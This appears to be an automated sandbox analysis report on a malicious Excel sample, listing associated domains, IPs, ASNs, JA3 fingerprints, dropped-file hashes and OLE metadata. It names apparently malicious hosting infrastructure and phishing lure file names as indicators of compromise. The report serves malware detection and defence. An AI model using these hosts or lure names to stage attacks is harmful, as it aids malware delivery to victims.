                                                                                                                                                                                                          5c89f585_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                            5c89f585_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                              statistic-1066846651.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                statistic-1066846651.xlsGet hashmaliciousBrowse

                                                                                                                                                                                                                  Domains

                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                                                  psq.com.mxstatistic-1496367785.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 162.241.2.112
                                                                                                                                                                                                                  33c179ca_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 162.241.2.112
                                                                                                                                                                                                                  33c179ca_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 162.241.2.112
                                                                                                                                                                                                                  7fb953aa_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 162.241.2.112
                                                                                                                                                                                                                  7fb953aa_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 162.241.2.112
                                                                                                                                                                                                                  statistic-462462953.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 162.241.2.112
                                                                                                                                                                                                                  statistic-462462953.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 162.241.2.112
                                                                                                                                                                                                                  statistic-1403316517.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 162.241.2.112
                                                                                                                                                                                                                  statistic-1403316517.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 162.241.2.112
                                                                                                                                                                                                                  statistic-260077031.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 162.241.2.112
                                                                                                                                                                                                                  statistic-260077031.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 162.241.2.112
                                                                                                                                                                                                                  5c89f585_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 162.241.2.112
                                                                                                                                                                                                                  5c89f585_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 162.241.2.112
                                                                                                                                                                                                                  statistic-1066846651.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 162.241.2.112
                                                                                                                                                                                                                  statistic-1066846651.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 162.241.2.112
                                                                                                                                                                                                                  academy.haleemcampus.com33c179ca_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 108.179.232.80
                                                                                                                                                                                                                  33c179ca_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 108.179.232.80
                                                                                                                                                                                                                  7fb953aa_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 108.179.232.80
                                                                                                                                                                                                                  7fb953aa_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 108.179.232.80
                                                                                                                                                                                                                  statistic-462462953.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 108.179.232.80
                                                                                                                                                                                                                  statistic-462462953.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 108.179.232.80
                                                                                                                                                                                                                  statistic-1403316517.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 108.179.232.80
                                                                                                                                                                                                                  statistic-1403316517.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 108.179.232.80
                                                                                                                                                                                                                  statistic-260077031.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 108.179.232.80
                                                                                                                                                                                                                  statistic-260077031.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 108.179.232.80
                                                                                                                                                                                                                  5c89f585_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 108.179.232.80
                                                                                                                                                                                                                  5c89f585_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 108.179.232.80
                                                                                                                                                                                                                  statistic-1066846651.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 108.179.232.80
                                                                                                                                                                                                                  statistic-1066846651.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 108.179.232.80

                                                                                                                                                                                                                  ASN

                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                                                  OIS1USstatistic-1496367785.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 162.241.2.112
                                                                                                                                                                                                                  Purchase Order.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 162.241.85.212
                                                                                                                                                                                                                  DHL DOCUMENTS.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 162.241.85.210
                                                                                                                                                                                                                  New_PO#98202139.xllGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 162.241.2.66
                                                                                                                                                                                                                  Payment_Swift00987.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 162.241.2.50
                                                                                                                                                                                                                  Payment_Advice.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 162.241.2.50
                                                                                                                                                                                                                  PO#8076.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 162.241.2.239
                                                                                                                                                                                                                  New_Order.xllGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 162.241.2.66
                                                                                                                                                                                                                  PO36782110.xllGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 162.241.2.66
                                                                                                                                                                                                                  Product_Inquiry.xllGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 162.241.2.66
                                                                                                                                                                                                                  Request for quotation,PDF.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 162.241.203.147
                                                                                                                                                                                                                  Request for quotation,PDF.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 162.241.203.147
                                                                                                                                                                                                                  CARGO ARRIVAL NOTICE-MEDICOM AWB.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 162.241.85.231
                                                                                                                                                                                                                  Payment_Advice.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 162.241.2.50
                                                                                                                                                                                                                  ZRvY1UrHuF.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 162.241.203.185
                                                                                                                                                                                                                  PO_no52071.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 162.241.2.122
                                                                                                                                                                                                                  33c179ca_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 162.241.2.112
                                                                                                                                                                                                                  33c179ca_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 162.241.2.112
                                                                                                                                                                                                                  7fb953aa_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 162.241.2.112
                                                                                                                                                                                                                  7fb953aa_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 162.241.2.112
                                                                                                                                                                                                                  UNIFIEDLAYER-AS-1USstatistic-1496367785.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 108.179.232.80
                                                                                                                                                                                                                  4dvYb6Nq3y.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 50.87.238.189
                                                                                                                                                                                                                  Remittance.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 162.241.120.180
                                                                                                                                                                                                                  SecuriteInfo.com.Trojan.Win32.Save.a.27842.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 192.185.164.148
                                                                                                                                                                                                                  SEOCHANG INDUSTRY Co., Ltd..exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 162.241.24.206
                                                                                                                                                                                                                  7R9igRpuL4.msiGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 192.185.0.218
                                                                                                                                                                                                                  nxinF8KuKS.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 192.185.16.56
                                                                                                                                                                                                                  242jQP4mQP.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 50.87.248.20
                                                                                                                                                                                                                  Halkbank.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 192.185.0.218
                                                                                                                                                                                                                  HBenKsn2R8.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 96.125.162.104
                                                                                                                                                                                                                  DC Viet Nam Order list 6-25-21.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 162.144.0.158
                                                                                                                                                                                                                  Minutes of Meeting 22062021.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 108.167.156.42
                                                                                                                                                                                                                  plan-1053707320.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 50.116.92.246
                                                                                                                                                                                                                  plan-1053707320.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 50.116.92.246
                                                                                                                                                                                                                  factura y factura de la v#U00eda a#U00e9rea.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 74.220.199.6
                                                                                                                                                                                                                  T5gtQGRL8u.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 162.241.135.156
                                                                                                                                                                                                                  PO 74230360.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 162.241.114.107
                                                                                                                                                                                                                  PO 74230360.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 162.241.114.107
                                                                                                                                                                                                                  PO 74230360.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 162.241.114.107
                                                                                                                                                                                                                  plan-930205822.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 50.116.92.246

                                                                                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                                                  37f463bf4616ecd445d4a1937da06e19Bank_ details.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 108.179.232.80
                                                                                                                                                                                                                  • 162.241.2.112
                                                                                                                                                                                                                  prijenos SWIFT za partiju 220000000001182910.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 108.179.232.80
                                                                                                                                                                                                                  • 162.241.2.112
                                                                                                                                                                                                                  PO29012021,pdf.ppamGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 108.179.232.80
                                                                                                                                                                                                                  • 162.241.2.112
                                                                                                                                                                                                                  OFfcxY5xia.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 108.179.232.80
                                                                                                                                                                                                                  • 162.241.2.112
                                                                                                                                                                                                                  k72fFnCoEX.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 108.179.232.80
                                                                                                                                                                                                                  • 162.241.2.112
                                                                                                                                                                                                                  DWJn18MuX6.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 108.179.232.80
                                                                                                                                                                                                                  • 162.241.2.112
                                                                                                                                                                                                                  sp7UUM849P.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 108.179.232.80
                                                                                                                                                                                                                  • 162.241.2.112
                                                                                                                                                                                                                  CL2SJ8-LYGF7Z-SEJ2QPPAPL.htmGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 108.179.232.80
                                                                                                                                                                                                                  • 162.241.2.112
                                                                                                                                                                                                                  AqZrR9upiM.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 108.179.232.80
                                                                                                                                                                                                                  • 162.241.2.112
                                                                                                                                                                                                                  iduD2A1.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 108.179.232.80
                                                                                                                                                                                                                  • 162.241.2.112
                                                                                                                                                                                                                  E6973qZ1cV.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 108.179.232.80
                                                                                                                                                                                                                  • 162.241.2.112
                                                                                                                                                                                                                  97FC461FD24104740310BD741F7F8EBF489E640AA93A0.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 108.179.232.80
                                                                                                                                                                                                                  • 162.241.2.112
                                                                                                                                                                                                                  Tu33yM3ZKj.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 108.179.232.80
                                                                                                                                                                                                                  • 162.241.2.112
                                                                                                                                                                                                                  BNK1135000001.docxGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 108.179.232.80
                                                                                                                                                                                                                  • 162.241.2.112
                                                                                                                                                                                                                  message_zdm.htmlGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 108.179.232.80
                                                                                                                                                                                                                  • 162.241.2.112
                                                                                                                                                                                                                  Financial Statements.htmlGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 108.179.232.80
                                                                                                                                                                                                                  • 162.241.2.112
                                                                                                                                                                                                                  Wilson-McShane Corporation ACH.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 108.179.232.80
                                                                                                                                                                                                                  • 162.241.2.112
                                                                                                                                                                                                                  Dfdvfczl_Signed_.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 108.179.232.80
                                                                                                                                                                                                                  • 162.241.2.112
                                                                                                                                                                                                                  9irkb5Rbn8.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 108.179.232.80
                                                                                                                                                                                                                  • 162.241.2.112
                                                                                                                                                                                                                  kgx2fkTmpa.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 108.179.232.80
                                                                                                                                                                                                                  • 162.241.2.112

                                                                                                                                                                                                                  Dropped Files

                                                                                                                                                                                                                  No context

                                                                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\0A8CE175-D39D-43AE-8F1B-CA84388C02A0
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                  File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):135209
                                                                                                                                                                                                                  Entropy (8bit):5.363078467391509
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:pcQIKNgeBTA3gBwlpQ9DQW+zoY34ZliKWXboOidX5E6LWME9:9EQ9DQW+zwXO1
                                                                                                                                                                                                                  MD5:F36D695FFC65C02CF6642D107DE3436E
                                                                                                                                                                                                                  SHA1:A6E39AE62834265B4937B554FF799614E6CBD2BC
                                                                                                                                                                                                                  SHA-256:0A1F0B3E72F02FBF65827B4356D516DA6D321ACB4EB356F16657728C82584E94
                                                                                                                                                                                                                  SHA-512:E21B9C58D9A8AE3B1CA665CB890568370C080F42E41072CED05ED5CA5C4A7507ADF0AC349300276F24EC4CDCE5BFB3D88FF53AB15A14443EFB4FE6D5D3BD9850
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-06-29T15:47:13">.. Build: 16.0.14228.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\BDB40000
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):82869
                                                                                                                                                                                                                  Entropy (8bit):7.897086363765867
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:ILMCBgFqO57Lav5F/U2SiwFNfZ7pjS8ZiYhuiNde9kJY:04qO5PWzUWwtNm8ZUmY
                                                                                                                                                                                                                  MD5:30C64BA689D114C1B1F07726F4B0F643
                                                                                                                                                                                                                  SHA1:6E453A1835195371901BDEC66BDDE4EAAC7B0DD2
                                                                                                                                                                                                                  SHA-256:E9806EDFE4032C38F466EC4CB002167D14B5076F4197EBE861053E1A3BE5ECC9
                                                                                                                                                                                                                  SHA-512:A285BEF29AB022AC67BB0E0D55E0A9DD1E04F16D301C5EA081AC7B7D6AA598875692E742FCAB3285A61BA2C51EC632AE8BAC04CE5E1BE2603899763B4512510E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                  Preview: .U.N.0.}G.....J\@Z!....w.`?....U..1..=c7..JK)...'s.3.x|...z.....7#V..^i....u}.*L.)a...-.......n..+.v.>.p.9......p...hE.... .\t.OF._\z...:e.6._.L.T]-hy.d...~...T-.!.-E"....w$......%..C....H.4!jb.......o...{.m..7gD0......2K)..?...r.c........T7".?.[|a......f;H6.b....).5V........Y.......?A.v.l._.....Qt.B....b........c..t........\..g..a'...........6..].k..:T..Y.....}...K3.&..4.#....D..u .I.z.m..kF......@m...<.......PK..........!.[:..............[Content_Types].xml ...(.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 17:12:41 2019, mtime=Tue Jun 29 14:47:14 2021, atime=Tue Jun 29 14:47:14 2021, length=12288, window=hide
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):904
                                                                                                                                                                                                                  Entropy (8bit):4.655853070338881
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:8vVCXUM7t7gcduCH2BvOpM4IiujBF+WrjAZ/DYbDMSeuSeL44t2Y+xIBjKZm:8W9qmpTyVAZbcDG7aB6m
                                                                                                                                                                                                                  MD5:C28D5CC4959D0E1E0857E734A7985781
                                                                                                                                                                                                                  SHA1:02DD24C036CD987F04E14B31EF9ECDEDF4B75E50
                                                                                                                                                                                                                  SHA-256:E1050433736C4F3D25755ECD8A6E34798FA29A618D0A58BC759B4D208756C19A
                                                                                                                                                                                                                  SHA-512:B48A5C3C3280FD958E5042B35A152E976770ED7C9AD959048870DF6790740DF9007302E66BDEDCBC0D33523995DDF3E74172DA641AC48EDB37D7638D779DD23C
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                  Preview: L..................F.............-..1?r..l....o..l...0......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R.}....................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Q}<..user.<.......N...R.}....#J........................j.o.n.e.s.....~.1......R.}..Desktop.h.......N...R.}.....Y..............>......(..D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......820094...........!a..%.H.VZAj...m<...............!a..%.H.VZAj...m<..........................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):113
                                                                                                                                                                                                                  Entropy (8bit):4.71317481637129
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:oyBVomMnUTWeS4UOytUTWeS4UmMnUTWeS4Uv:dj6nUTL8tUTLinUTLK
                                                                                                                                                                                                                  MD5:827572951026F0F9437E31D866B8FF08
                                                                                                                                                                                                                  SHA1:0B6A363D618B5E1D031EE6E5DCE5C18A9B13BBE6
                                                                                                                                                                                                                  SHA-256:493A258224290D5C5BB92DC4C57E3B8E36D4BE213CC9F3744D69D345F03B843B
                                                                                                                                                                                                                  SHA-512:F224FE824B181BEA88A282AFDD4528CF59F8952BD571C595AC6E6E3F2E7E9FA499B9E8FC5DE623B02501C0D341A82B3A7053B7550746CA36CDC6EBF1FBA662DB
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                  Preview: Desktop.LNK=0..[xls]..statistic-1496367785.LNK=0..statistic-1496367785.LNK=0..[xls]..statistic-1496367785.LNK=0..
                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\statistic-1496367785.LNK
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 06:35:54 2020, mtime=Tue Jun 29 14:47:15 2021, atime=Tue Jun 29 14:47:15 2021, length=176128, window=hide
                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                  Size (bytes):2210
                                                                                                                                                                                                                  Entropy (8bit):4.704393826342388
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:8Ogw9qmp5Y5MiWlOkMkBB6pOgw9qmp5Y5MiWlOkMkBB6:8hcZiWlOdwKhcZiWlOdw
                                                                                                                                                                                                                  MD5:1DBF118D07425F742972F80B6F479464
                                                                                                                                                                                                                  SHA1:348393828935581579897E182E3872D7033C7054
                                                                                                                                                                                                                  SHA-256:8996BA14F72BBE59CC466D0F4AB1911D640C453A9EC210C47DD791D3301037AB
                                                                                                                                                                                                                  SHA-512:9A2021007A4621460404B0BDC89CC20E55E35F7F26F6F4AAAFD5F3961AA10539D9D8122016337C16769CE55F360D49B2CF54EF351A671C799CA325D283135453
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                  Preview: L..................F.... ....\T........l......l...............................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R.}....................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Q}<..user.<.......N...R.}....#J........................j.o.n.e.s.....~.1.....>Q.<..Desktop.h.......N...R.}.....Y..............>......T..D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....~.2......R.} .STATIS~1.XLS..b......>Q|<.R.}.....V.....................a..s.t.a.t.i.s.t.i.c.-.1.4.9.6.3.6.7.7.8.5...x.l.s.......^...............-.......]...........>.S......C:\Users\user\Desktop\statistic-1496367785.xls../.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.s.t.a.t.i.s.t.i.c.-.1.4.9.6.3.6.7.7.8.5...x.l.s.........:..,.LB.)...As...`.......X.......820094...........!a..%.H.VZAj...Z................!a..%.H.VZAj...Z...........................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.
                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                  File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):22
                                                                                                                                                                                                                  Entropy (8bit):2.9808259362290785
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:QAlX0Gn:QKn
                                                                                                                                                                                                                  MD5:7962B839183642D3CDC2F9CEBDBF85CE
                                                                                                                                                                                                                  SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                                                                                                                                                                                                                  SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                                                                                                                                                                                                                  SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                                                                                                  Preview: ....p.r.a.t.e.s.h.....
                                                                                                                                                                                                                  C:\Users\user\Desktop\7EB40000
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                  File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):222635
                                                                                                                                                                                                                  Entropy (8bit):5.628519548551312
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6144:a8rmdAIByzElbSRg3WCbgBeP5NmPTdbsizCnQC6VqCJ6KS8rmdAIByzElbSRg3WS:uLnQC6sCRY
                                                                                                                                                                                                                  MD5:6F378E0FCB99595324566C5A91985656
                                                                                                                                                                                                                  SHA1:9059F775A49511C7A614F831EC90841008171C0D
                                                                                                                                                                                                                  SHA-256:3026EAEDD6AFA59DF4C54D4CF1E1EE6A4891F32CC83B2B1AA95426B0F6458763
                                                                                                                                                                                                                  SHA-512:467D5668E72E6D3B891D261512CDDC4A53742B06E2D345BA8180F46FEFA23958BD77D0D6E188624B3F0132A3DB738C108BF774BD918A3571F55CFB98E9B42C06
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                  Preview: ........T8..........................\.p....pratesh B.....a.........=...............................................=........V..8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.*.h...6...........C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1.......4..........C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.

                                                                                                                                                                                                                  Static File Info

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: van-van, Last Saved By: Grog, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:17:20 2015, Last Saved Time/Date: Fri May 21 09:07:02 2021, Security: 0
                                                                                                                                                                                                                  Entropy (8bit):2.0857713013138395
                                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                                  • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                                                                                                                  • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                                                                                                                  File name:statistic-1496367785.xls
                                                                                                                                                                                                                  File size:536064
                                                                                                                                                                                                                  MD5:7fb48e03b899f792be6c3118a46c5c8f
                                                                                                                                                                                                                  SHA1:55445d13cd433121c6c2bfb31414b08e31e28a65
                                                                                                                                                                                                                  SHA256:1c818433e1ca49729f987b3f060b2133c8375f8164181c4684600a278ee6033f
                                                                                                                                                                                                                  SHA512:e950fe3278277996dbfb9f7f80bd03976793ba4967f272612f901eea83e1284a512104348ab14d3028dcac0ef9cd527dde9ce22323c90fa080fae3fcdc79905f
                                                                                                                                                                                                                  SSDEEP:6144:C6tIrWqrY5O3NMHGRYc9u/YRTP85XbDu1XYiXxy:Ru1XPE
                                                                                                                                                                                                                  File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                                                                                                                                                                  File Icon

                                                                                                                                                                                                                  Icon Hash:74ecd4c6c3c6c4d8

                                                                                                                                                                                                                  Static OLE Info

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Document Type:OLE
                                                                                                                                                                                                                  Number of OLE Files:1

                                                                                                                                                                                                                  OLE File "statistic-1496367785.xls"

                                                                                                                                                                                                                  Indicators

                                                                                                                                                                                                                  Has Summary Info:True
                                                                                                                                                                                                                  Application Name:Microsoft Excel
                                                                                                                                                                                                                  Encrypted Document:False
                                                                                                                                                                                                                  Contains Word Document Stream:False
                                                                                                                                                                                                                  Contains Workbook/Book Stream:True
                                                                                                                                                                                                                  Contains PowerPoint Document Stream:False
